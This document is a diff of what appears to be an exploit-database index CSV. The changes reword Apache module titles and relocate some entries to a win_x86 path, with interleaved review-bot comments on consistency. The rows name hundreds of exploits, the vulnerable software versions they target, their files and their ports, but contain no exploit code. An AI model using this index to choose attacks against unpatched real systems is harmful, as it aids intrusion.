41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
41171,platforms/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -8812,7 +8814,7 @@ id,file,description,date,author,platform,type,port
63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114
64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
67,platforms/multiple/remote/67.c,"Apache 1.3.x (mod_mylo) - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21
@ -8851,7 +8853,7 @@ id,file,description,date,author,platform,type,port
126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80
127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0
130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80
135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
@ -8979,7 +8981,7 @@ id,file,description,date,author,platform,type,port
581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25
583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
584,platforms/windows/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0
584,platforms/win_x86/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,win_x86,remote,0
588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0
590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000
@ -9030,7 +9032,7 @@ id,file,description,date,author,platform,type,port
758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Local Parsing Buffer Overflow",2005-01-16,nemo,osx,remote,0
759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode Exploit",2005-01-16,ATmaCA,windows,remote,0
761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162
764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,unix,remote,80
765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21
771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0
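Review bot: dropping the `(2)` suffix from the 764 description (`'OpenFuckV2.c' Remote Exploit`) is only safe if no sibling entry still carries a `(1)` for the same exploit; please confirm before merging, since the numbered suffix is how duplicates of one exploit are told apart elsewhere in this file (see the `(1)`/`(2)` pairs for 23481/23482 and 39277/40003 in this diff).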
@ -9156,7 +9158,7 @@ id,file,description,date,author,platform,type,port
1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515
1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105
1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722
1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",windows,remote,13722
1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",win_x86,remote,13722
1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722
1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0
1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode Exploit",2005-10-29,ATmaCA,windows,remote,0
@ -9429,7 +9431,7 @@ id,file,description,date,author,platform,type,port
3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote,0
3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0
3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21
3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80
3680,platforms/win_x86/remote/3680.sh,"Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,win_x86,remote,80
3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote,0
3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0
3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - 'Specially Crafted 802.11 Packets' Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0
@ -9444,7 +9446,7 @@ id,file,description,date,author,platform,type,port
3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0
3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0
3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0
3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,windows,remote,0
3822,platforms/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote,0
3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0
3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Stack Overflow",2007-05-04,shinnai,windows,remote,0
3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0
@ -9473,7 +9475,7 @@ id,file,description,date,author,platform,type,port
3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow",2007-05-24,rgod,windows,remote,0
3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow",2007-05-25,rgod,windows,remote,0
3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow",2007-05-26,rgod,windows,remote,0
3996,platforms/windows/remote/3996.c,"Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80
3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80
4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0
4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0
4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0
@ -9509,7 +9511,7 @@ id,file,description,date,author,platform,type,port
4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999
4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0
4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0
4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80
4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit",2007-07-08,Xpl017Elz,linux,remote,80
4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0
4176,platforms/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0
4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0
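Review bot: moving `exec-shield` into a quoted prefix for 4162 (`mod_jk - 'exec-shield' Remote Exploit`) leaves the two other exec-shield entries visible in this diff, 3815 and 3829, with the older trailing `(exec-shield)` form; either apply the same rewording to those rows or leave 4162 as it was so the three stay consistent.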
@ -9620,7 +9622,7 @@ id,file,description,date,author,platform,type,port
4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2007-12-18,axis,windows,remote,0
4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0
4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0
4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128
4754,platforms/win_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",win_x86,remote,3128
4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,multiple,remote,25
4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80
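Review bot: the path and platform columns of 4754 change from platforms/windows/remote/4754.pl / windows to platforms/win_x86/remote/4754.pl / win_x86 while the description itself is unchanged; the file has to be moved in the same commit, otherwise the index points at a path that no longer exists. The same move is applied to 5079, 5330 and 6100 in the hunks below, so all four relocated files should be verified together (11615 further down already lives under platforms/win_x86, so the target layout is the established one).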
@ -9671,7 +9673,7 @@ id,file,description,date,author,platform,type,port
5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - 'AddBitmap()' ActiveX Buffer Overflow",2008-02-03,Elazar,windows,remote,0
5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow",2008-02-06,securfrog,windows,remote,0
5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote,0
5079,platforms/windows/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,windows,remote,515
5079,platforms/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,win_x86,remote,515
5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0
5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0
5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0
@ -9703,12 +9705,12 @@ id,file,description,date,author,platform,type,port
5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0
5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69
5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69
5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,windows,remote,80
5330,platforms/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,win_x86,remote,80
5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0
5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0
5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510
5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote,0
5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0
5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0
@ -9754,7 +9756,7 @@ id,file,description,date,author,platform,type,port
6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80
6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0
6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0
6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0
@ -10127,7 +10129,7 @@ id,file,description,date,author,platform,type,port
9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0
9993,platforms/multiple/remote/9993.txt,"Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
9993,platforms/multiple/remote/9993.txt,"Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0
9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0
9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0
@ -10222,7 +10224,7 @@ id,file,description,date,author,platform,type,port
11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0
11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0
11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0
11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
@ -11169,7 +11171,7 @@ id,file,description,date,author,platform,type,port
17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0
17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0
17969,platforms/multiple/remote/17969.py,"Apache (mod_proxy) - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
@ -12317,7 +12319,7 @@ id,file,description,date,author,platform,type,port
21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0
21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit",2002-07-30,spabam,unix,remote,80
40347,platforms/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0
@ -13913,7 +13915,7 @@ id,file,description,date,author,platform,type,port
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
@ -14731,7 +14733,7 @@ id,file,description,date,author,platform,type,port
36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0
36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0
36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36352,platforms/linux/remote/36352.txt,"Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
36352,platforms/linux/remote/36352.txt,"Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,windows,remote,0
36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0
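Review bot: the version in 36352, "Apache 7.0.x mod_proxy", looks wrong: the Apache HTTP Server has no 7.x release line, and the companion entry 36663 a few hunks below records the same reverse proxy security bypass as "Apache 2.2.15 mod_proxy". Since the description is being rewritten here anyway, check the advisory text and either correct the version or name the product whose version 7.0.x actually is, rather than carrying the odd number forward in the new form.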
@ -14774,7 +14776,7 @@ id,file,description,date,author,platform,type,port
36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667
36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)",2015-04-06,Metasploit,jsp,remote,8080
36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0
36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0
@ -15063,7 +15065,7 @@ id,file,description,date,author,platform,type,port
39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0
39194,platforms/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote,0
39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0
39196,platforms/linux/remote/39196.py,"Apache (mod_wsgi) - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
39196,platforms/linux/remote/39196.py,"Apache mod_wsgi - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
